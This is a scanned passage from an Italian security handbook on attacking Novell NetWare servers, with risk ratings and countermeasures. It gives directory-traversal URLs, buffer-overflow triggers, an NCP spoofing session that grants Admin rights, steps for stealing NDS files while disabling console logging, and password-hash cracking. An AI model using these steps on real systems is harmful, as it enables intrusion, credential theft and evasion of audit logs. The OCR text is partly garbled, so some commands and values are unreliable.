1. Interrogate dal browser Web il file di script convert.bas e passate come 
parametro uno dei file presenti sul disco. Per esempio: 


http://www.server.com/scripts/convert.bas?../../system/autoexec.ncf 


2. Se riuscite a vedere il contenuto del file autoexec.ncf, allora siete vulnera- 
bili all’attacco. 


Contromisure per il NetWare Web Server 


Aggiornate la versione del Web Server all'indirizzo http://ww.support.novell.com, 
oppure almeno alla versione 2.51R1. Novell ha corretto i difetti degli script Basic nella 
directory SCRIPTS, in modo che l’accesso possa avvenire solamente per file già stabiliti. 


Visualizzazione del codice sorgente 
di TomCat su NetWare 6 


Diffusione: 6 
Semplicità: 7 
Impatto: 9 
Fattore di rischio: 7 


Come già sanno molti amministratori di Microsoft IIS, i file di prova distribuiti insie- 
me ai server Web possono essere fonte di problemi. È quanto avviene nel rilascio 
più recente di NetWare 6, in cui un file di prova abilita il client a visualizzare i file 
presenti sul server. Eccone un esempio: 


http://ww.server.com/examples/jsp/source.jsp?%2e%2e/%2e%2e / 
%2e%2e/%2e%2e/etc/console.log 


Se potete visualizzare il contenuto del file di log della vostra console, gli hacker 
possono in qualsiasi momento accedere al vostro server in questo semplice modo, 
e con un comando simile ottenere il file autoexec.ncf, oppure ldremote.nef: an- 
cora peggio, potrebbero scoprire la vostra password RCONSOLE (a questo proposi- 
to, consultate il paragrafo sulle alternative a RCONSOLE, più avanti.in questo capi- 
tolo). Se un hacker ottiene l’accesso alla console di sistema, sarà difficile fermarlo. 
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e Contromisura alla visualizzazione del codice 
sorgente di TomCat su NetWare 6 


In NetWare, come pure nel mondo Windows, gli script di esempio sono molto utili 
durante la fase di test delle macchine, ma costituiscono un rischio per la sicurezza 
dei sistemi di produzione, Ricordate sempre di rimuovere tutti gli script di esempio, 
prima di mettere ufficialmente in rete il vostro server NetWare. È l’unica contromi- 
sura possibile per questo tipo di attacchi. 


E) Visualizzazione delle informazioni 
sul server Web di Novonyx per NetWare 5 


Diffusione: 2 
Semplicità: 8 
Impatto: 1 


DSS 


Fattore di rischio: 


I flussi di sicurezza delle applicazioni Web, che agli amministratori di IIS sembrano 
preistoria, sono in qualche misura ancora utilizzati da NetWare Enterprise Web Ser- 
ver. In diversi script di NetWare 5 si può trovare la visualizzazione delle informazio- 
ni riguardanti l'ambiente del server Web, basta visitare i seguenti URL (nome_server 
è il nome del server che si vuole visualizzare): 
http://www.nome_server/perl/env.pl 

http://www. nome_server/se/?SYS:/novonyx/suitespot/docs/sewse/misc/allfield 
.jse 

http://www. nome_server/se/?SYS:/novonyx/suitespot/docs/sewse/misc/test.jse 


Un hacker che ha già effettuato il footprinting della rete può riuscire a trovare sia 
nomi dei server sia le informazioni sulla versione, semplicemente utilizzando il se- 
guente comando: 


http://www.nome_server/netbasic/websinfo.bas 


Volete sapere quanto spazio libero è presente sul disco rigido di quel bel server 
Payroll sul quale state per portare a termine il vostro attacco? Non c'è problema: 


http://ww.nome_server/perl/samples/volscgi.pl 

Ecco l'output dello script volscegi.pl: 

Description Total Space Free Space Block Size Total Dir 
SYS 6065984 5390848 65536 
66048 


Quel server BorderManager possiede due o tre interfacce di rete? Perl consente di 
effettuare un controllo veloce e di ottenere l'informazione voluta: 


http://www. nome_server/perl/samples/lancgi.pl 
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Qui di seguito è riportato l'output dello script lancgi. pl: 


Description Address Media Type 
Compaq Ethernet or Fast Ethernet NIC 658B50004354 ETHERNET_802,2 
Compaq Ethernet or Fast Ethernet NIC 658B50004354 ETHERNET_II 


..€ siccome siamo dei ficcanaso, andiamo anche a vedere il contenuto del file 
autoexec.ncf del server scelto come bersaglio. Se siamo fortunati, potremo an- 
che trovare una password RCONSOLE: 


http://www.nome_server/lcegi/sewse.nlm?sys:/novonyx/ 
suitespot/docs/sewse/viewcode.jse+httplist+httplist/ 
sel..1../../../SyStem/autoexec.ncf 


© Contromisura alla visualizzazione delle informazioni 
sul server Web di Novonyx per NetWare 5 


Gli script di esempio, come già detto in precedenza, non dovrebbero fare parte dei 


sistemi di produzione, quindi liberatevi di questi file prima di mettere ufficialmente 
in rete il vostro server NetWare. 


1) Vulnerabilità Directory Traversal di NetBasic 


Diffusione: 5 
Semplicità: dI 
Impatto: a) 
Fattore di rischio: 8 


Nel luglio 1998 Novell ha incluso tra le sue licenze NetBasic 7.0, della HiTecSoft 
(High Technology Software Corporation): questo prodotto permette agli sviluppatori 
di creare applicazioni utilizzando semplici script in un linguaggio simile a Visual 
Basic, senza bisogno di utilizzare il compilatore e il linker Watcom (necessari, fino a 
questo momento, per scrivere un file NLM per NetWare). Sebbene sia stata un gros- 
so passo avanti per gli sviluppatori, questinnovazione ha aperto la strada anche 
allo sviluppo di una serie di worm ai danni dei sistemi NetWare collegati a Internet. 
Nella versione di NetWare più recente, la directory virtuale /nsn/ corrisponde alla 
directory SYS:NSN/WEB del server Web, che per fortuna non contiene alcun file at- 
taccabile con facilità dai pirati informatici. Nonostante questo, NetBasic può essere 
attaccato con la stessa tecnica di Directory Traversal usata sui sistemi IIS. La di- 
rectory SYS:NSN/UTIL contiene, infatti, diversi script interessanti, ai quali si può ac- 
cedere da remoto: 


http://www.nome_server/nsn/..%5Cutil/slist.bas 
http://ww.nome_server/nsn/..%5Cutil/dsbrowse.bas 
http://ww.nome_server/nsn/..%5Cutil/dir.bas 
La possibilità che un utente possa utilizzare lo script dir.bas per visualizzare da re- 
moto il contenuto della partizione sulla quale è installato NetWare dovrebbe già co- 
Stituire un motivo sufficiente per convincere qualsiasi amministratore a disabilitare 
NetBasic, tuttavia, se non siete ancora convinti, provate a digitare, all’interno di una 
barra degli indirizzi Web, un URL costituito dall'indicazione della directory virtuale 
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{nsn/, seguita da 230 caratteri: i moduli NetBasic delle versioni NetWare Small Bu- 
siness Suite, NetWare 5 o NetWare 6 subiranno il buffer overflow. Quando il modu- 
lo si bloccherà in stato di ABEND, l'hacker potrà sovrascrivere la memoria del siste- 
ma con dati o codice di sua scelta: quest'ultimo sarà eseguito nel contesto di sicu- 
rezza del modulo di NetBasic, che è davvero molto elevato. A tutt'oggi non si è an- 
cora verificato nessun attacco di questo tipo, ma si può ragionevolmente ritenere 
che ciò sia dovuto più alla perdita di popolarità di NetWare che alla difficoltà di rea- 
lizzare uno script in grado di portare a termine un simile attacco. 


D) Contromisure alla vulnerabilità Directory 
Traversal di NetBasic 


Se siete sicuri che l’azienda nella quale lavorate non possiede nessuna applicazione 
personalizzata scritta in linguaggio NetBasic, potete facilmente risolvere il problema 
eliminando questo componente dalla vostra installazione di NetWare. Se, invece, 
avete bisogno di NetBasic, è consigliabile installare la patch distribuita da Novell 
nell’agosto 2002, scaricabile all'indirizzo Web http://support.novell.com/serv- 
let/tidfinder/2963297. 


® iManage e eMFrame su NetWare 6 


Diffusione: 2 
Semplicità; 9 
Impatto: 10 
Fattore di rischio: 7 


NetWare 6 è dotato di un'’utilissima applicazione Web denominata iManage, che 
permette la gestione degli oggetti all’interno di eDirectory (un servizio di directory 
meglio noto con il nome di NDS). L'applicazione eMFrame, invece, semplifica la ge- 
stione di eDirectory basata sul ruolo delle diverse figure aziendali, ed è implemen- 
tata come una servlet Java. 

In eDirectory 8.6 la lunghezza massima della proprietà DN (Distinguisbed Name) è 
di 256 caratteri: se durante la procedura di autenticazione di eMFrame da parte di 
eDirectory si forniscono più di 256 caratteri si provoca il crash della servlet eMFra- 
me, dopo il quale (per ripristinare le normali funzionalità di iManage) sarà necessa- 
rio riavviare la macchina. 


D Contromisure per iManage e eMFrame su NetWare 6 


Una misura di sicurezza fin troppo ovvia, ma purtroppo non implementabile, consi- 
ste nel consentire l’accesso a iManage ai soli utenti interni con privilegi di ammini- 
strazione, configurando opportunamente il firewall: non c'è motivo, infatti, di 
esporre a Internet i servizi di iManage. Se non utilizzate iIManage, rimuovete il file 
NLM a esso relativo e cancellate la sua chiamata dal file autoexec.ncf; se invece ne 
avete bisogno installate la patch rilasciata da Novell nell'agosto 2002, scaricandola 
all'indirizzo Web http://support.novell.com/servlet/tidfinder/2963081. 
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® NetWare Remote Manager 


Diffusione: 2 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 7 


NetWare 5.1 ha dato, per primo, agli amministratori la possibilità di gestire da remo- 
to i server di una NetWare utilizzando una connessione HTTPS sicura. La finestra di 
controllo di NetWare Remote Manager presenta una sorta di semaforo, in cui il ros- 
so, il giallo e il verde rappresentano lo stato del server NetWare preso in esame, I 
servizi offerti da questo portale sicuro permettono di modificare la configurazione, 
e funzionano anche su macchine NetWare 6. Il Remote Manager viene installato di 
default sulla porta 'TCP 8009 e le sue richieste vengono gestite dal modulo HTTP - 
STK.NLM, che va in stato di ABEND quando nel campo del nome utente vengono di- 
gitati più di 626 caratteri; per il modulo SERVER. NLM, invece, devono essere inviati 
595 caratteri. Una volta mandato in crash il servizio, da remoto sarà possibile inseri- 
re nella memoria dati strutturati, in quanto l’hacker avrà ottenuto un accesso alla 
console del sistema. 


Contromisura per NetWare Remote Manager 


Gli utenti di NetWare 5 devono installare il Support Pack 3, prima di procedere con 
l'installazione della patch per questa vulnerabilità. Per Netware 6 i file NLM corretti 
sono inclusi nel Support Pack 2, mentre quelli per NetWare 5.1 si trovano nel Sup- 
port Pack 5. Potete, in ogni caso, reperirli all'indirizzo Web http://support.no- 
vell.com/servlet/tidfinder/noheader/2962026. 


Attacchi di tipo spoofing (Pandora) 


Diffusione: 3 
Semplicità: 7 
Impatto: 10 
Fattore di rischio: 7 


Se finora avete fallito nell’ottenere l’accesso all'utente amministratore, esiste uno 
strumento per l’attacco di tipo spoofing NCP scoperto dal NMRC (Nomad Mobile Re- 
search Center, http://www.nmrc.org) che offre all'utente i livelli di autorizzazione 
di un amministratore. Questo strumento è stato affettuosamente chiamato “Pando- 
ra” (http://ww.nmrce.org/pandora/download.html) ed è disponibile nella ver- 
sione 4.0. In queste pagine evidenzieremo, però, le caratteristiche della più diffusa 
versione 3.0. Affinché Pandora riesca a funzionare correttamente, è necessario che 
siano soddisfatti una serie di requisiti, elencati di seguito. 
@ Dovete avere una scheda di rete attiva, per cui è abilitato lo specifico pac- 

ket driver. Solamente alcune schede di rete dispongono di un packet driver. 

Dovete contattare il fornitore o il produttore di schede di rete per accertare 

la disponibilità di questo driver. Abbiamo avuto successo con i seguenti 
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produttori: Netgear, D-Link e 3Com. Il packet driver, inoltre, deve essere 
configurato per agganciarsi all’interrupt 0x60. 

e Per poterattivare Pandora, dovete caricare il supporto DOS DPMI. Potete 
scaricare i file necessari dal sito appena citato, dov'è disponibile il pacchet- 
to Pandora. 

e È necessario che troviate un contenitore nell'albero delle risorse che con- 
tenga sia l'utente Admin (o un amministratore) sia l’utente di livello inferio- 
re per il quale siete in possesso delle credenziali corrette. 


® gameover 


gameover (nome veramente appropriato) consente di trasformare un utente qua- 
lunque in un amministratore. Il programma funziona truccando una richiesta NCP e 
facendo in modo che il server NetWare 4.x consenta l’autorizzazione all'accesso di 
una richiesta di tipo SET EQUIVALENT TO. Di seguito viene mostrato il modo in cui 
dev'essere impostato il client DOS/Windows 95, per ottenere questo risultato. 

1. Eseguite il boot in DOS. 


2. Caricate il packet driver (per esempio un driver D-Link): 
de22xpd 0x60 
3. Caricate il supporto DPMI per DOS: 
cwsdpmi 
A questo punto, raccogliendo le informazioni con On-Site (occorre sempre autenti- 
carsi con un nome utente valido), potete rintracciare le informazioni necessarie per 


ottenere le autorizzazioni di Admin sul server. Le informazioni utilizzate sono mo- 
strate anche nella Figura 6.7. Avviate gameover nel modo seguente: 


Gameover<cr> 

Server internal net (4 bytes hex) 
36FCC65D<cr> 

Server address (6 bytes hex) 
200000000001<cr> 


File server connection number (int) 

most probably '1' (seen as: '*<server _name>.<server.context>') 
4<cr> 

Server socket high (1 byte hex) 

most probably '40' 40<cr> 

Server socket low (1 byte hex) 

Most probably '07' 39<cr> 

User name to gain rights (does NOT have to be currently connected) 
eculp<cr> 

User name to get rights from (does not have to be currently connected) 
Admin<cr> 

Spoofing: Done. 


Adesso potete effettuare l'autenticazione come utente ECULP e avrete magicamente 
i diritti di amministratore. Niente male, vero? 
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ME On-Site Admin - Novell Developer Support 


File Help 


‘alale] a] ‘eo 


Servers | Vols/RQs Connections | 


Connections. @ Name FiNode | Connection Information — 
sit SECRET.HSS i 
*SECRET.HSS___J4 ___ |Dooog 10000001 Bonnedtion 4 Reload Li 

5 000000000001 ; 

DI 35; 

: 0060089AS9DA Login Time \10\99 16:35:34 

8 0060089AB9D4 Network Address. 36FCCG5D 

3 000086100947 Node Address —’000000000001-4039 

| 0000861 CD947 È B 
NOT_LOGGED_IN 1 0000861 CD947 Connection Type . Unknown Met 
NOT_LOGGED_ IN 6 000000000001 Uses License Unknown 


Files Locked Unknown 
Records Locked Unknown 
Bytes Read Unknown 


Locked Files 


Bytes Written Unknown 
Total Requests 


Unknown 


‘1 Servers [1 Volumes (8 connectione. 


Figura 6.7 


Come ciascun utente autorizzato potrete avere da On-Site tutte le informazioni necessarie 
per diventare" amministratore. 


Pandora, inoltre, contiene numerose altre utilità per NetWare che vale la pena di 
menzionare. Sono disponibili altri due programmi per eseguire lo spoofing NCP, 
chiamati level1-1 e level3-1. Entrambi dovrebbero essere in grado di impostare 
la proprietà SET EQUIVALENT allo stesso modo di gameover, anche se in contesti di- 
versi. Non siamo stati in grado di far funzionare correttamente questi programmi di 
utilità in laboratorio. 

Extract, crypto e crypto2, sempre disponibili con Pandora, sono programmi di 
crack di password NDS e verranno trattati in seguito nel paragrafo dedicato al crack 
di NDS. Per finire, havoc è un eccellente programma che provoca un attacco di tipo 
Denial of Service. 


Contromisure a Pandora 


Fortunatamente esistono numerose contromisure in grado di fermare gli attacchi di 
spoofing. Nella maggior parte dei casi la contromisura da adottare dipende dalle 
specifiche NetWare del vostro server. Di seguito comunque troverete alcune linee 
guida per una corretta impostazione dei vostri sistemi. 


e Non permettete mai all'utente Admin (o a un amministratore) di stare nello 
stesso contenitore insieme a normali utenti. 
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e Fatesìchele vostre password per l’utente Admin (incluse quelle degli uten- 
ti con privilegi di amministrazione) siano lunghe almeno 17 caratteri, in 
quanto Pandora funziona solo con password di questo tipo. 

e  Installate l’ultimo Support Pack 9 reperibile all'indirizzo ftp://ftp.no- 
vell.com/pub/updates/nw/nw411/nw4sp9.exe. Questa patch aggiorna il file 
DS.NLM e risolve i problemi provocati dagli attacchi di spoofing. Può essere 
scaricata liberamente dal sito di Novell http://ww.support.novell.com. 

e Le firme digitali cifrano i pacchetti NCP che attraversano la rete, contribuendo 
alla sicurezza interna soprattutto nei casi in cui il lavoro di cifratura e decifra- 
tura costituirebbe un sovraccarico per il server. Notate, comunque, che que- 
sta funzionalità influisce sulle prestazioni della CPU solo da 100 utenti in su. 


e Inserite il comando SET PACKET SIGNATURE OPTION = 3 prima dell'avvio di 
DS.NLM. Aggiungete questa riga all'inizio del file autoexec.ncf oppure alla 
fine del file startup.nef. 


e Potete anche chiamare lo script SYS:SYSTEM\secure.ncf dall'interno del 
file autoexec.ncf: questo script attiva la firma dei pacchetti e imposta altri 
piccoli particolari. Abbiate l'accortezza di inserire questo script all’inizio 
del file autoexec.ncf. Modificate il file secure.ncf e attivate la riga SET 
PACKET SIGNATURE OPTION = 3, eliminando il simbolo di commento. 


e  Abilitate la firma digitale dei pacchetti NCP per gli utenti a elevata sicurezza 
(come Admin), facendo clic con il tasto destro del mouse sull'icona della 
barra delle applicazioni che riporta una “N” rossa e selezionando la voce 
Novell Client Properties dal menu contestuale. Nella sezione Advanced Set- 
tings, impostate a 3 il valore signature level. 


Utilizzo di Admin su un Server 


A questo punto la parte più difficile del lavoro dell'hacker è finita. Una volta rag- 
giunte le autorizzazioni di un utente amministratore, si è aperto gran parte dell’ac- 
cesso all'albero delle risorse. Il prossimo passo consiste nell'ottenere l’accesso 
rconsole per estorcere i file NDS. 


È 
® Hacking di rconsole 


Diffusione: 8 
Semplicità: 10 
Impatto: 10 
Fattore di rischio: 9 


Il metodo più semplice per ottenere la password di rconsole si basa sulla pigrizia degli 
amministratori. L'impostazione predefinita della password di rconsole di solito è scritta 
in chiaro in un file specifico. I passaggi elencati di seguito illustrano dove cercarla. 
1. Visualizzate il file SYS:\SYSTEM\autoexec.nef. 
2. Cercate la riga load remote. La password dovrebbe essere il parametro suc- 
cessivo. Di solito è scritta in chiaro: 


load remote ucantcme 
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3. Se non vedete una password in chiaro, ma il parametro -E seguito da una 
stringa alfanumerica, dovrete complimentarvi con gli amministratori del si- 
stema, perché la password di remote è stata scritta in formato cifrato: 


load remote -E 158470C4111761309539D0 


Per un hacker risoluto questo è solo un ostacolo aggiuntivo sulla strada che condu- 
ce al controllo del vostro sistema; infatti, uno di questi, che si fa chiamare “Drea- 
mer” (o “TheRuiner”), ha recentemente decifrato l'algoritmo di hash e ha scritto un 
programma in Pascal per decifrare la password remote (http://packetstormsecu- 
rity.nl/Netware/penetration/Remote.zip). Sul sito di Hacking Exposed, all’in- 
dirizzo http://www.hackingexposed.com, potete anche trovare il programma Perl 
che noi stessi abbiamo scritto e che esegue la stessa funzione. 

L'unico trucco necessario per poter utilizzare rconsole consiste, quindi, nel trovare 
la password (in formato cifrato o meno). Se avete difficoltà a recuperare la pass- 
word dal sistema, provate a seguire i consigli elencati di seguito. 


e Se non trovate load remote nel file autoexec.ncf, non vi scoraggiate; la 
pass-word potrebbe risiedere in un altro file NCF. Per esempio il file SYS: SY - 
STEM\ldremote.ncf viene utilizzato in modalità predefinita per contenere il 
comando load remote. Potete ricercare la password in chiaro o cifrata all’in- 
terno di questo file. 


e Se ancora non riuscite a trovare load remote, questo potrebbe significare 
che l'amministratore di sistema ha permesso a inetefg di spostare tutto il 
contenuto di autoexec.ncf nei file initsys.ncf e netinfo.cfg. Entrambi 
questi file risiedono in SYS:ETC. Quando un amministratore avvia inetefg 
alla console, il programma cerca di spostare tutti icomandi contenuti nel file 
autoexec.ncf all’interno dei file di configurazione di inetcfg. Come risul- 
tato, la password (sempre in chiaro o cifrata) dovrebbe trovarsi all’interno di 
uno di questi file, esattamente come era disponibile nel file autoexec,ncf. 


Contromisure per rconsole (password in chiaro) 


La vera soluzione al problema delle password in chiaro consiste nel non usare le 
password: nel caso in cui per accedere alla console remota debba essere richiesta 
una procedura di autenticazione (talvolta non lo è), prendete in considerazione la 
possibilità di utilizzare l'applicazione RCONJ per NetWare 5.x, oppure una delle 
tante utility di terze parti create appositamente per questo scopo: tra le tante consi- 
gliamo sfConsole di AdRem, che anziché richiedere la stessa password a tutti gli 
amministratori effettua la cifratura a 128 bit del flusso dei dati e una procedura di 
autenticazione della sessione remota presso l'NDS. 

Se proprio volete utilizzare rconsole (anche se non se ne vede il motivo), Novell 
fornisce un meccanismo che consente di cifrare la password di reonsole con il co- 
mando remote encrypt.I passaggi seguenti spiegano come attivare la cifratura. 

1. Assicuratevi che rspx e remote non siano caricati, 


2. Nella console digitate load remote password (inserite la password cor- 
retta), 


3. Alla console digitate remote encrypt. 
4. Inserite la password di rconsole. 
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5. Il programma vi chiederà se volete aggiungere la password al file SYS:SYS- 
TEM\ldremote.ncf. Rispondete in modo affermativo. 
6. Rimuovete la password dai file autoexec.ncf o netinfo.cfg. 


7. Assicuratevi di aggiungere ldremote.ncf nel file autoexec.ncf per chiamare il 
comando load remote. 


Non esistono altre soluzioni per questa debolezza. Verificate in ogni caso 
gi all'indirizzo Web http://packetstormsecurity.nl1/Netware/penetra- 
tion/Remote.zip e riconsiderate l'opportunità di utilizzare rconsole. 


Entrare in possesso dei file NDS 


Diffusione: 8 
Semplicità: 8 
Impatto: 10 
Fattore di rischio: 9 


Dopo aver ottenuto la password di console, il passo finale consiste nell’accedere ai 
file NDS. Novell conserva i file NDS in una directory nascosta chiamata _netware 
sul volume SYS. L'unico modo per accedere a questa directory è attraverso l’accesso 
alla console (oppure a rconsole per un hacker che si è già introdotto). Esistono di- 
verse tecniche per entrare in possesso di un file NDS e scoprirete che ciascun hac- 
ker preferisce certi metodi anziché altri. 


C) NetBasic.nlm (SYS:SYSTEM) 


Il componente di supporto di NetBasic, netbasic.nlm, possiede una capacità che è 
stata scoperta da un hacker: è in grado di accedere all'intero volume da riga di co- 
mando, compresa la directory nascosta _netvare. Volendo, potete anche copiare i 
file della licenza (MSL.000) e quelli di auditing (NET$AUDT.CAF), che altrimenti 
non riuscireste a visualizzare. o 
NetBasic viene installato in modalità predefinita insieme a NetWare 4, 5 e 6, per cui 
la nostra tecnica preferita per l’accesso ai file NDS è di norma già presente. Inoltre 
NetBasic è l'unica tecnica di furto di file NDS che è in grado di copiare i file senza 
chiudere Directory Services. Di seguito trovate i passaggi da applicare per ottenere 
questo risultato. 
1. Aprite rconsole con il comando SYS:\PUBLIC\rconsole. 
2. Digitate unload conlog (con questo comando disattivate il log dei comandi 
della console). 
. Digitate load netbasic.nlm. 
4. Digitate shell. 
5. Digitate cd \_netware (questa è la directory nascosta, visibile solamente 
dalla console di sistema). 
6. Digitate md \login\nds. 
7. Digitate copy block.nds \login\nds\block.nds. 
8. Digitate copy entry.nds \login\nds\entry.nds. 


iN) 
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9. Digitate copy partitio.nds \login\nds\partitio.nds. 
10. Digitate copy value.nds \login\nds\value.nds. 


a Se l'amministratore è stato così solerte da cancellare anche il modulo 

COPY.NLM , dovrete provvedere da voi. Novell ba rimosso questo file dal pro- 

prio sito Web, tuttavia potete reperirlo all'indirizzo http://ww.wastelands. 
gen.nz/netware/copynlm3.exe. 


11. Digitate exit (per uscire dalla shell). 
12. Digitate unload netbasic. 
13. Digitate load conlog (per riavviare il log della console). 


14. Da una postazione client, utilizzate il comando map per collegare un’unità 
disco alla directory LOGIN\NDS creata in precedenza. 


si Copiate i file *.NDS sulla vostra postazione locale. 
. Avviate il cracking. 


È Dsmaint 


Se gli amministratori di NetWare sono abbastanza accorti, NetBasic non sarà dispo- 
nibile ai vostri tentativi di intrusione. In questo caso è necessario passare a metodi 
alternativi: Dsmaint. Questo modulo NLM non è presente nell’installazione standard 
di NetWare 4.11, ma può essere scaricato da Novell all'indirizzo http://www. sup- 
port.novell.com. Il file si chiama DS411P.EXE ed è disponibile all'indirizzo http: 
//support.novell.com/servlet/filedownload/pub/ds411p.exe. Vi avvertiamo 
in anticipo che, poiché l'aggiornamento Dsmaint chiude automaticamente i servizi 
di directory, nelle ore in cui il sistema viene maggiormente sfruttato è sconsigliabile 
effettuare l’installazione di questo aggiornamento. Per ripristinare i servizi di di- 
rectory alle condizioni originali, dovete avviare le procedure di recupero Dsmaint. 
In altre parole, sicuramente non dovrete applicare su un server di produzione la 
procedura che segue. 


1. Mappate un’unità a SYS:SYSTEM. 

2. Copiate il file dsmaint.nlm sul disco mappato. 

3. Ottenete l’accesso a rconsole con il comando reonsole. 
‘4 


. Digitate unload conlog (con questo comando disattivate il log dei comandi 
della console). 


. Digitate load dsmaint. 
. Selezionate la voce Prepare NDS For Hardware Upgrade. 
. Collegatevi come Admin. 


Questo comando disattiverà i servizi Directory Services. 


Il file backup.nds viene salvato automaticamente nel volume SYS:SYSTEM. 
1. Selezionate la voce Restore NDS Following Hardware Upgrade. 
2. Digitate load conlog. 
3. Nella vostra postazione client, mappate un’unità a SYS:SYSTEM. 
4. Copiate il file backup. nds sul vostro disco locale. 


Nu vu 
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5. Utilizzate la funzione extract disponibile con il pacchetto Pandora per crea- 
re i quattro file NDS (block, entry, partitio e value), 

6. Avviate il cracking. 
Il vecchio file dsrepair.nlm consente anche di preparare il sistema ad aggiorna- 
menti hardware, in modo da creare i file NDS di backup in SYS:SYSTEM. Vi avver- 
tiamo che dsrepair dovrebbe essere utilizzato solamente con le vecchie versioni di 
NetWare 4.x e in modo particolare non dovrebbe assolutamente essere installato 
sui sistemi che sono stati aggiornati con i Support Pack. 


© Jcemd 


JRB Software Limited distribuisce una serie eccellente di programmi di utilità per 
NetWare da oltre sei anni: molti di questi possono essere utilizzati per monitorare la 
sicurezza dei server NetWare. Al contrario di NetBasic, Jemd non è in grado di co- 
piare i file NDS, mentre questi sono utilizzati. Per questo motivo, esattamente come 
dsmaint.nlm, l'utilizzo di Jemd non è consigliato per i sistemi di produzione; infatti 
è necessario anche in questo caso disattivare Directory Services per procedere con 
la copia dei file. Per copiare i file NDS utilizzando Jemd potete adottare la procedu- 
ra elencata di seguito. 

1. Mappate un'unità a SYS:SYSTEM. 

2. Copiate jemd.nlm sul disco mappato. 

3. Aprite rconsole con il comando SYS: \PUBLIC\rconsole. 


4. Digitate unload conlog (con questo comando disattivate il log dei comandi 
della console). 


5. Digitate unload ds. 
6. Digitate load jcmd. 
7. Digitate cd \_netware. Viene visualizzata la schermata mostrata di seguito. 


5 CAWINNT\System32\cmd.exe - rconsole 


Base features MS-DOS COMMAND.COM emulator version 1.39 
Following commands are available: 

<drive>: logical drive <MSD0S>) or volume selection 

CD <path> change directory of current drive 

MD <path> create directory 

DIR Farice:1t thI[file] current or specified directory listing 

COPY [/81L/T]L/D] Ispath\]Kfile> fdpathi file copy. Options: /8: copy subdir 

ZT: + trustees, /D: Don't compress 


VER displays program version 

EXIT ends COMMAND.COM emulator session 

REN [Ispath\I[file] [dpath] renames files or dirs. No wildcards alloved. 

DEL [path\}file> deletes files) or directorylies) 

HELP displays this help screen 

VOL displays table of existing volumes 

SALU pat ienzte] PEAZIGE DAI erased files listing C&handling) 

TYPE ppt [/B displays file<s> content <(/B: binary) 

ATTR [filepath] CRINTAITIPISYISH +1-] ‘redsets file’s attributes | 
CMD [filepath] use file as command source “no SALU 78P) | 
LOGIN rrrogetant [userI CMDpwd]] logs into another server (pud only for CMD) | 
LOG [N] : CIE : A] lognane] creates logfile of NonelError!A11 

3 <text> renmar 


Command may be written both UPPER #7 lower case. Works only for MS8DOS name space. 
SYS:\_NETVARE> 


si 


8. Digitate dir *.* (dovete utilizzare i caratteri jolly *.* per vedere i file con 
Jemd). 
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9. Digitate md\login\nds. 
10. Digitate copy block.nds\login\nds. 
11. Digitate copy entry.nds\login\nds. 
12. Digitate copy partitio.nds\login\nds, 
13. Digitate copy value.nds\login\nds. 
14. Digitate exit (per uscire dalla shell). 
15. Digitate load ds. 
16. Digitare load conlog. 


17. Dalla postazione client, utilizzate il comando map per collegarvi alla di- 
rectory SYS:LOGIN. 


18. Copiate i file *.NDS in locale. 
19. Avviate il cracking. 


Contromisure al furto dei file NDS 


Ancora una volta è possibile ridurre il rischio di furto di file NDS, riducendo il nu- 
mero di armi che un hacker potrebbe utilizzare. 


1. Cifrate la password di rconsole come è stato descritto in precedenza. 


2. Rimuovete netbasic.nlm dal file SYS:\SYSTEM e utilizzate il comando 
purge sulla directory. Il file netbasic.nlm di solito non è necessario al nor- 
male funzionamento del server. 


O) Cracking dei file NDS 


Una volta che l’hacker è in grado di ottenere i vostri file NDS, la partita è pratica- 
mente finita. È ovvio che non vorrete in nessun caso arrivare fino a questo punto. 
Una volta estorti i file NDS, l'hacker cercherà senza dubbio di eseguire il cracking di 
questi file utilizzando uno dei tanti programmi disponibili. Utilizzando uno dei pro- 
grammi di utilità gratuiti, disponibili su Internet, come IMP di Shade e crypto 0 
erypto2 di Pandora, chiunque sarà in grado di eseguire il crack dei file NDS. 

Dal punto di vista di un amministratore di sistema, è sempre consigliabile scaricare 
i vostri file NDS come farebbe un ipotetico hacker e tentare poi di decifrare voi stes- 
si le password contenute. Potete avviare il cracking utilizzando un dizionario di ter- 
mini molto esteso e quando sarà individuata qualche password, potete fare in modo 
— che l’utente corrispondente la modifichi immediatamente, costringendolo ad adot- 
tarne una più sicura. Oltre a essere un utile strumento di monitoraggio, questo eser- 
cizio vi consente di valutare la lunghezza delle password dei vostri utenti. 

erypto e crypto2, disponibili insieme a Pandora, possono essere utilizzati rispetti 
vamente per eseguire sui file NDS un attacco di forza bruta, oppure basato su un di- 
zionario di parole. Per iniziare la decifrazione, applicate i passaggi seguenti. 


4 Copiate i file backup.nds o backup.ds nella directory locale \PANDORA 
NO \EXE. 
2. Utilizzate il programma di utilità extract per estrarre i quattro file NDS da 


- 


__backup.nds: 


extract -d 
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3. Utilizzate di nuovo questo programma per estrarre gli hash delle password 
dai file NDS e create un file password.nds, come mostrato nella figura se- 
guente. 


extract -n 


8 C \WINNTXS ystem32\cmd exe 


EXTRACI — Extract the password information from NDS files 
default path is current directory Pe | 

Comments/bugs: pandora@nmrc .0rg 

http://www.nmrc.org/pandora 

1999, 1998 <‘c>) Nomad Mobile Research Centre 


CN=Admin 0=HSS G19900b9 10 02287c6£049?a2781efcdaa379dif66c 
CN=jscambray 0=HSS 070000ef 6 3b4b359dbh?cah?1b7deh5848058bdicb 
CN=smcclure 0=HSS 819000fa 8 Bc4f0770468d4442084109bhba9d0882£15 
(CN=jsymoens 0=HSS 6B10000fh 13 @5cd@071742ce4bf8ffb719b84a4efa16 
CN=gkurtz 0=HSS 010000fd 5 75b544541592832£920b7cd8af2f2334 
CN=mdolphin 0=HSS 010000fe 6 7a6?c6£31861ee06c0016d723a4ff5eb 
CN=deoane 0=HSS B19000ff 5 39575a?4aacBbc736cad587ee16268af 
CN=jsmith 0=HSS 81900190 0 72cab55hc996169883fd558488916hd9? 
CN=rpaul 0=HSS 610900181 0 d5ebb5h346832e8577989553509e2c5bf 
CN=jhanley 0=HSS 981990192 9 82ae2792c036£8e25£23b22de5217cdd 
CN=nneadows 0=HSS 010001093 0 408f90de284c87e189e4db89371dab3f 
CN=abirchard 0=HS8 81000194 14 ?%a?133ab681de5dc709e53b51a9c6086 
CN=ehammond 0=HSS 9010900105 0 £270e3feabd92e7737908288009765b08 
CN=jbenson 0=HSS B1990106 7 29%aide6?aaB6747332786112337d5e57 
CN=eculp 0=HSS 01900107 0 f4acedbc815h536£95cc245469a62208 
CN=jhomey 0=HSS 01000198 0 Bc1ea9h009902073038a49578856de55 
auge 0=HSS 91000109 5 a38c33704c709bdbeb378749f89d4ed9 
